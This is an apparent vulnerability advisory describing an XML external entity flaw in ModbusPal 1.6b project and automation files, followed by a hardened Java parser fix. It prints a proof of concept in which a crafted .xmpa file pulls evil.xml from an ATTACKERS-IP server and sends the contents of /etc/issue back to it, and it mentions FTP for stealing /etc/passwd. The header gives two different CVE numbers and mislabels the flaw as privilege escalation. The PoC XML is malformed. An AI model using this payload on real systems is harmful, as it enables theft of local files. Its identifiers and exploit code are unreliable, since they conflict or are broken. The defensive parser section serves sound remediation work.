ModbusPal 1.6b CVE-2018-10832 – XML External Entity Injection

Authors: Trent Gordon    Risk: High

CVE: CVE-2018-7891    0day: Privilege Escalation

0day-id: 0DAY-176159    Date: 2018-05-10


ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack. Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based and vulnerable to XXE injection. Sending a crafted .xmpp or .xmpa file to a user, when opened/imported in ModbusPal 1.6b, will return the contents of any local files to a remote attacker.


a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting evil.xml)
b.) Contents of hosted "evil.xml"
<!ENTITY % data SYSTEM "file:///etc/issue">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://ATTACKERS-IP:9999/?%data;'>">
c.) Example Exploited "xxe.xmpa"
<?xml version="1.0" ?>
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/evil.xml">
<!DOCTYPE modbuspal_automation SYSTEM "modbuspal.dtd">
<automation name="temp" step="1.0" loop="true" init="0.0">

Additional Details

Java 1.7 contains certain defenses against XXE, including throwing an exception when certain characters (such as '\n') are included in a URL. This means that the file exfiltrated in the above attack is limited to single-line files that don't contain any restricted characters. The above POC uses /etc/issue, which is one of the few common Linux files that meets this criterion. Exploitation of this vulnerability on later versions of Java requires a more creative approach than described above, such as using FTP instead of URL to exfiltrate /etc/passwd.
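The fix on the application side is to parse .xmpp/.xmpa files with a parser that does not process DTDs or resolve external entities. The following is an added example, not ModbusPal's own code: a hardened javax.xml DocumentBuilder configuration, exercised against a constructed benign automation file and a constructed file that carries a DOCTYPE with an off-host parameter entity (the host example.invalid is a placeholder). The class and method names are assumptions for the illustration.

```java
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import java.io.StringReader;

public class SafeXmppParser {

    // Builds a DocumentBuilder that refuses DOCTYPE declarations outright and,
    // as a second layer, never fetches external general/parameter entities or
    // an external DTD even if a DOCTYPE were allowed through.
    public static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Strongest setting: any DOCTYPE in the input is a parse error.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth: no entity resolution over file:// or http://.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Returns true if the document parsed, false (with the parser's reason) if
    // it was rejected. A rejection is the expected outcome for a DOCTYPE-bearing file.
    public static boolean parses(DocumentBuilder b, String xml) {
        try {
            Document d = b.parse(new InputSource(new StringReader(xml)));
            return d.getDocumentElement() != null;
        } catch (Exception e) {
            System.out.println("rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample inputs, modelled on the <automation> element above.
        String benign = "<?xml version=\"1.0\"?>\n"
            + "<automation name=\"temp\" step=\"1.0\" loop=\"true\" init=\"0.0\"/>";
        String withDoctype = "<?xml version=\"1.0\"?>\n"
            + "<!DOCTYPE modbuspal_automation ["
            + " <!ENTITY % sp SYSTEM \"http://example.invalid/evil.xml\"> ]>\n"
            + "<automation name=\"temp\" step=\"1.0\" loop=\"true\" init=\"0.0\"/>";

        DocumentBuilder b = hardenedBuilder();
        System.out.println("benign file parses: " + parses(b, benign));
        System.out.println("DOCTYPE file parses: " + parses(b, withDoctype));
    }
}
```

Note the caveat visible in the PoC itself: the automation file declares `<!DOCTYPE modbuspal_automation SYSTEM "modbuspal.dtd">`. If legitimate project files carry that DOCTYPE, `disallow-doctype-decl` will reject them too; in that case keep DOCTYPEs allowed but leave the three external-entity/external-DTD features set to false, which still prevents both the file:// read and the outbound http:// request that the attack depends on.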

